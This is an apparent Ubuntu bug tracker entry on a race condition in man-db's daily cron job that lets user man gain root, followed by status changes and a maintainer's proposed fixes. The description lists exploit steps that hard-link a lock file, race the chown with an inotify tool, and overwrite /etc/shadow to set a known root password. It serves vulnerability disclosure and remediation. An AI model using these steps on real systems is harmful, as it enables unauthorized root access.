man-db daily cron job TOCTOU bug when processing catman pages
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
apport (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned | ||
man-db (Ubuntu) |
Fix Released
|
High
|
Colin Watson | ||
pam (Ubuntu) |
Confirmed
|
Undecided
|
Unassigned | ||
shadow (Ubuntu) |
Confirmed
|
Undecided
|
Unassigned |
Bug Description
The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is:
# expunge old catman pages which have not been read in a week
if [ -d /var/cache/man ]; then
cd /
if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>1; then
find /var/cache/man -ignore_
xargs -r0 chown -f man || true
fi
...
By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation.
man# mkdir -p /var/cache/man/etc
man# ln /var/crash/.lock /var/cache/
man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc
... Wait till daily cronjob was run
man# cp /etc/shadow .
man# sed -r -e 's/^root:
man# cat x > /etc/shadow; rm x
man# su -s /bin/sh (password is 123)
root# cat shadow > /etc/shadow; chown root /etc/shadow
# lsb_release -rd
Description: Ubuntu 14.04.3 LTS
Release: 14.04
# apt-cache policy man-db
man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
*** 2.6.7.1-1ubuntu1 0
500 http://
100 /var/lib/
2.6.7.1-1 0
500 http://
[1] http://
CVE References
information type: | Private Security → Public Security |
Changed in man-db (Ubuntu): | |
importance: | Undecided → Medium |
Changed in apport (Ubuntu): | |
status: | Confirmed → Fix Committed |
Changed in man-db (Ubuntu): | |
status: | Confirmed → Fix Committed |
Changed in pam (Ubuntu): | |
status: | Confirmed → Fix Committed |
Changed in shadow (Ubuntu): | |
status: | Confirmed → Fix Committed |
Changed in apport (Ubuntu): | |
status: | Fix Committed → Confirmed |
Changed in man-db (Ubuntu): | |
status: | Fix Committed → Confirmed |
Changed in pam (Ubuntu): | |
status: | Fix Committed → Confirmed |
Changed in shadow (Ubuntu): | |
status: | Fix Committed → Confirmed |
Thanks Halfdog, this is as usual very interesting.
I think there's several issues here that should be addressed:
- apport's /var/crash/.lock should be set mode 600 instead of 777
- mandb should be rebuilt with ./configure --disable-cats
- the cronjobs and systemd tmp file handling should be removed
At least, I think it's time to remove the cat pages. They seem more trouble than they are worth. I'm not sure why the cronjob changes file ownership and I'm having trouble finding out why it would need to. So I'd rather remove it, and the reason for it to exist. Are there other mediation steps that we should take?
Removing the cat pages is a fairly large change but I'm not seeing smaller options that would address this without removing them. Are there any other smaller steps that I've overlooked?
Thanks